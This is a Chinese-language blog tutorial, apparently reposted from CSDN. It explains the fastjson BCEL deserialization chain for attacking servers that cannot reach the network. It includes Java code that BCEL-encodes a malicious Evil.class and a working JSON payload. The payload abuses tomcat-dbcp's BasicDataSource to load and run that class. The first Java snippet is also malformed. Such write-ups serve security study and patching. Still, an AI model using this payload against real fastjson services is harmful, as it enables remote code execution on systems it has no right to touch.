fastjson不出网打法—BCEL链

前言

众所周知fastjson公开的就三条链，一个是TemplatesImpl链，但是要求太苛刻了，JNDI的话需要服务器出网才行，BCEL链就是专门应对不出网的情况。

实验环境

fastjson1.2.4

jdk8u91

dbcp 9.0.20

什么是BCEL

BCEL的全名应该是Apache Commons BCEL，它是一个库。这个库里面有类叫com.sun.org.apache.bcel.internal.util，而这个类里面有一个classLoader类，ClassLoader类里面有一个loadClass方法，如果满足class_name.indexOf("$$BCEL$$") >= 0，那么就会调用createClass这个方法。

我们跟踪进createClass方法看看，可以看到这里会对进来的数据进行解码，所以我们传payload时要进行编码。

所以我们BCEL代码应该是这样的，这里读取盘下的Evil.class文件，然后经过BCEL编码，再加上$$BCEL$$去绕过我们前面的if判断使其解码，最后再借助classLoader.loadClass去加载我们的恶意代码。可能不知道我在说啥，我说白了就是，在不出网的环境中你主机无法去请求http的资源，那么我就把恶意代码转换成字节码传进去，通过调用里面的方法使其执行。

import com.sun.org.apache.bcel.internal.classfile.Utility;
import org.springframework.util.FileCopyUtils;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;

public class fastjsonBcel {
    public static void main(String[] args) throws Exception {
        //不考虑fastjson情况就正常调用该类
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));
        String code = Utility.encode(bytes,true);
        classLoader.loadClass("$$BCEL$$"+code).newInstance();
        
        //将文件转为字节码数组
    public static byte[] fileToBinArray(File file){
        try {
            InputStream fis = new FileInputStream(file);
            byte[] bytes = FileCopyUtils.copyToByteArray(fis);
            return bytes;
        }catch (Exception ex){
            throw new RuntimeException("transform file into bin Array 出错",ex);
        }
    }

}

fastjson

那么我们该如何把这个方法和fastjson结合起来呢，可以结合tomcat-dbcp这个类进行组合达到触发fastjson，tomcat-dbcp里面有一个BasicDataSource类，在反序列化的时候会调用getConnection()方法，而getConnection()方法在返回的时候又会调用createDataSource()方法。

而createDataSource()方法又调用了createConnectionFactory()方法。

继续跟踪，查看createConnectionFactory()方法，可以看到这里有两个参数

this.driverClassName和this.driverClassLoader。

通过动态类加载调用我们的loadclass，如果Class.forName(driverClassName, true, driverClassLoader)中的driverClassName和driverClassLoader可控，那么我们就可以传入我们正常BCEL生成的 classLoader和BCEL绕过的代码，恰巧这里有对应的set方法，那么在fastjson反序列化中就会调用set方法来达到可控的目的。

直接看poc，我们对这个s字符串进行反序列化，成功执行代码。

public class fastjsonBcel {
    public static void main(String[] args) throws Exception {
        byte[] bytes = fileToBinArray(new File("D:\\Evil.class"));
        String code = Utility.encode(bytes,true);
        String s = "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"driverClassName\":\"$$BCEL$$" + code + "\",\"driverClassloader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";
        JSON.parseObject(s);
    }

这里解释一下poc，指定类org.apache.tomcat.dbcp.dbcp2.BasicDataSource是为了控制上面我们说的driverClassName和driverClassLoader这两个参数，然后还指定了com.sun.org.apache.bcel.internal.util这个类，目的是触发里面的ClassLoader类和loadClass方法，使其加载我们的恶意代码，加上$$BCEL$$是为了绕过if判断，而由于触发方法会经过编码，所以我们要解码。

{
    {
        "aaa": {
                "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
            //这里是tomcat>8的poc，如果小于8的话用到的类是
            //org.apache.tomcat.dbcp.dbcp.BasicDataSource
                "driverClassLoader": {
                    "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName": "$$BCEL$$$l$8b$I$A$..."
        }
    }: "bbb"
}

总结

原理不算难，说大白话就是把恶意类变成一串字符 用bp直接发过去就行，但是如果要深究怎么触发方法的话就有点难度了，因为要代码审计。

原文地址：https://blog.csdn.net/2301_76227305/article/details/144035731

免责声明：本站文章内容转载自网络资源，如本站内容侵犯了原著者的合法权益，可联系本站删除。更多内容请关注自学内容网（zxcms.com）！